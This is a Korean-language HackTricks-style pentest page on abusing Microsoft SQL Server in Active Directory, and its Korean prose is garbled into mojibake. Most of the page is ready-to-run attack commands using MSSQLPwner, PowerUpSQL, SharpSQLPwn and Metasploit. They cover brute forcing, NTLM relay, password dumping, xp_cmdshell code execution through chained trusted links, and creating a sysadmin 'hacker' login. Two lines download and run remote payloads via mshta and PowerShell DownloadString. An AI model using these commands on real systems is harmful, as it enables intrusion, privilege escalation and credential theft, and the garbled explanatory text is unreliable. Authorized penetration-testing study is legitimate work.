MSSQL AD ๋จ์ฉ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
MSSQL ์ด๊ฑฐ / ๋ฐ๊ฒฌ
Python
MSSQLPwner ๋๊ตฌ๋ impacket์ ๊ธฐ๋ฐ์ผ๋ก ํ๋ฉฐ, kerberos ํฐ์ผ์ ์ฌ์ฉํ์ฌ ์ธ์ฆํ๊ณ ๋งํฌ ์ฒด์ธ์ ํตํด ๊ณต๊ฒฉํ ์ ์์ต๋๋ค.

Interactive mode with 2 depth level of impersonations
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec โcmd /c mshta http://192.168.45.250/malicious.htaโ -command-execution-method sp_oacreate
Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
Executing direct query
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query โSELECT CURRENT_USERโ
Retrieving password from the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
Execute code using custom assembly on the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
### ๋๋ฉ์ธ ์ธ์
์์ด ๋คํธ์ํฌ์์ ์ด๊ฑฐํ๊ธฐ
Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
---
### Powershell
์ด ๊ฒฝ์ฐ์ powershell ๋ชจ๋ [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)์ด ๋งค์ฐ ์ ์ฉํฉ๋๋ค.
```bash
Import-Module .\PowerupSQL.psd1
๋๋ฉ์ธ ์ธ์ ์์ด ๋คํธ์ํฌ์์ ์ด๊ฑฐํ๊ธฐ
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP โVerbose โThreads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
๋๋ฉ์ธ ๋ด๋ถ์์ ์ด๊ฑฐํ๊ธฐ
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
# Try dictionary attack to login
Invoke-SQLAuditWeakLoginPw
# Search SPNs of common software and try the default creds
Get-SQLServerDefaultLoginPw
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
MSSQL ๊ธฐ๋ณธ ์ ์ฉ
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ ๊ทผ
# List databases
Get-SQLInstanceDomain | Get-SQLDatabase
# List tables in a DB you can read
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName DBName
# List columns in a table
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName DBName -TableName TableName
# Get some sample data from a column in a table (columns username & passwor din the example)
Get-SQLInstanceDomain | GetSQLColumnSampleData -Keywords "username,password" -Verbose -SampleSize 10
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lot of CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
MSSQL RCE
MSSQL ํธ์คํธ ๋ด์์ ๋ช ๋ น์ ์คํํ๋ ๊ฒ๋ ๊ฐ๋ฅํ ์ ์์ต๋๋ค.
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
๋ค์ ์น์ ์์ ์๋์ผ๋ก ์ํํ๋ ๋ฐฉ๋ฒ์ ํ์ธํ์ญ์์ค.
MSSQL ๊ธฐ๋ณธ ํดํน ๊ธฐ๋ฒ
1433 - Pentesting MSSQL - Microsoft SQL Server
MSSQL ์ ๋ขฐ ๋งํฌ
MSSQL ์ธ์คํด์ค๊ฐ ๋ค๋ฅธ MSSQL ์ธ์คํด์ค์ ์ํด ์ ๋ขฐ๋ฐ๋ ๊ฒฝ์ฐ(๋ฐ์ดํฐ๋ฒ ์ด์ค ๋งํฌ). ์ฌ์ฉ์๊ฐ ์ ๋ขฐ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ค๋ฉด, ๊ทธ๋ ์ ๋ขฐ ๊ด๊ณ๋ฅผ ์ฌ์ฉํ์ฌ ๋ค๋ฅธ ์ธ์คํด์ค์์๋ ์ฟผ๋ฆฌ๋ฅผ ์คํํ ์ ์์ต๋๋ค. ์ด๋ฌํ ์ ๋ขฐ๋ ์ฐ๊ฒฐ๋ ์ ์์ผ๋ฉฐ, ์ด๋ ์์ ์์ ์ฌ์ฉ์๋ ๋ช ๋ น์ ์คํํ ์ ์๋ ์๋ชป ๊ตฌ์ฑ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ฅผ ์ฐพ์ ์ ์์ต๋๋ค.
๋ฐ์ดํฐ๋ฒ ์ด์ค ๊ฐ์ ๋งํฌ๋ ํฌ๋ฆฌ์คํธ ์ ๋ขฐ๋ฅผ ๋์ด ์๋ํฉ๋๋ค.
Powershell ๋จ์ฉ
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv โVerbose โInstance "SQLServer1\Instance1"
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
๋ ๋ค๋ฅธ ์ ์ฌํ ๋๊ตฌ๋ https://github.com/lefayjey/SharpSQLPwn:
SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa
# Cobalt Strike
inject-assembly 4704 ../SharpCollection/SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa
Metasploit
metasploit์ ์ฌ์ฉํ์ฌ ์ ๋ขฐํ ์ ์๋ ๋งํฌ๋ฅผ ์ฝ๊ฒ ํ์ธํ ์ ์์ต๋๋ค.
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
๋ฉํ์คํ๋ก์์ MSSQL์์ openquery() ํจ์๋ง์ ์
์ฉํ๋ ค๊ณ ์๋ํ ๊ฒ์
๋๋ค (๋ฐ๋ผ์, openquery()๋ก ๋ช
๋ น์ ์คํํ ์ ์๋ค๋ฉด, ์๋์์ ๋ ์์ธํ ์ค๋ช
ํ๋ EXECUTE ๋ฐฉ๋ฒ์ ์๋์ผ๋ก ์๋ํด์ผ ํฉ๋๋ค.)
์๋ - Openquery()
๋ฆฌ๋ ์ค์์ sqsh์ mssqlclient.py๋ฅผ ์ฌ์ฉํ์ฌ MSSQL ์ฝ์ ์ ธ์ ์ป์ ์ ์์ต๋๋ค.
์๋์ฐ์์๋ ๋งํฌ๋ฅผ ์ฐพ์ ์๋์ผ๋ก ๋ช ๋ น์ ์คํํ ์ ์์ผ๋ฉฐ, MSSQL ํด๋ผ์ด์ธํธ๋ก HeidiSQL์ ์ฌ์ฉํ ์ ์์ต๋๋ค.
์๋์ฐ ์ธ์ฆ์ ์ฌ์ฉํ์ฌ ๋ก๊ทธ์ธ:
.png)
์ ๋ขฐํ ์ ์๋ ๋งํฌ ์ฐพ๊ธฐ
select * from master..sysservers;
EXEC sp_linkedservers;
.png)
์ ๋ขฐํ ์ ์๋ ๋งํฌ์์ ์ฟผ๋ฆฌ ์คํ
๋งํฌ๋ฅผ ํตํด ์ฟผ๋ฆฌ๋ฅผ ์คํํฉ๋๋ค (์: ์๋ก ์ ๊ทผ ๊ฐ๋ฅํ ์ธ์คํด์ค์์ ๋ ๋ง์ ๋งํฌ ์ฐพ๊ธฐ):
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
Warning
๋๋ธ ๋ฐ ์ฑ๊ธ ์ธ์ฉ๋ถํธ๊ฐ ์ฌ์ฉ๋๋ ์์น๋ฅผ ํ์ธํ์ธ์. ๊ทธ๋ ๊ฒ ์ฌ์ฉํ๋ ๊ฒ์ด ์ค์ํฉ๋๋ค.
.png)
์ด ์ ๋ขฐํ ์ ์๋ ๋งํฌ ์ฒด์ธ์ ์๋์ผ๋ก ๋ฌดํํ ๊ณ์ํ ์ ์์ต๋๋ค.
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
openquery()์์ exec xp_cmdshell๊ณผ ๊ฐ์ ์์
์ ์ํํ ์ ์๋ ๊ฒฝ์ฐ EXECUTE ๋ฐฉ๋ฒ์ ์ฌ์ฉํด ๋ณด์ญ์์ค.
์๋ - EXECUTE
EXECUTE๋ฅผ ์ฌ์ฉํ์ฌ ์ ๋ขฐํ ์ ์๋ ๋งํฌ๋ฅผ ์
์ฉํ ์๋ ์์ต๋๋ค:
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
๋ก์ปฌ ๊ถํ ์์น
MSSQL ๋ก์ปฌ ์ฌ์ฉ์๋ ์ผ๋ฐ์ ์ผ๋ก **SeImpersonatePrivilege**๋ผ๋ ํน๋ณํ ์ ํ์ ๊ถํ์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ด๋ ๊ณ์ ์ด โ์ธ์ฆ ํ ํด๋ผ์ด์ธํธ๋ฅผ ๊ฐ์ฅํ ์ ์๋๋กโ ํ์ฉํฉ๋๋ค.
๋ง์ ์ ์๋ค์ด ์ ์ํ ์ ๋ต ์ค ํ๋๋ SYSTEM ์๋น์ค๊ฐ ๊ณต๊ฒฉ์๊ฐ ์์ฑํ ์ ์ฑ ๋๋ ์ค๊ฐ์ ์๋น์ค์ ์ธ์ฆํ๋๋ก ๊ฐ์ ํ๋ ๊ฒ์ ๋๋ค. ์ด ์ ์ฑ ์๋น์ค๋ ์ธ์ฆ์ ์๋ํ๋ ๋์ SYSTEM ์๋น์ค๋ฅผ ๊ฐ์ฅํ ์ ์์ต๋๋ค.
SweetPotato์๋ Beacon์ execute-assembly ๋ช
๋ น์ ํตํด ์คํํ ์ ์๋ ๋ค์ํ ๊ธฐ์ ์ด ๋ชจ์ฌ ์์ต๋๋ค.
SCCM ๊ด๋ฆฌ ์ง์ NTLM ๋ฆด๋ ์ด (OSD ๋น๋ฐ ์ถ์ถ)
SCCM ๊ด๋ฆฌ ์ง์ ์ ๊ธฐ๋ณธ SQL ์ญํ ์ด ์ฌ์ดํธ ๋ฐ์ดํฐ๋ฒ ์ด์ค์์ ๋คํธ์ํฌ ์ก์ธ์ค ๊ณ์ ๋ฐ ์์ ์ํ์ค ๋น๋ฐ์ ๋คํํ๋ ๋ฐ ์ด๋ป๊ฒ ์ ์ฉ๋ ์ ์๋์ง ํ์ธํ์ญ์์ค:
Sccm Management Point Relay Sql Policy Secrets
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


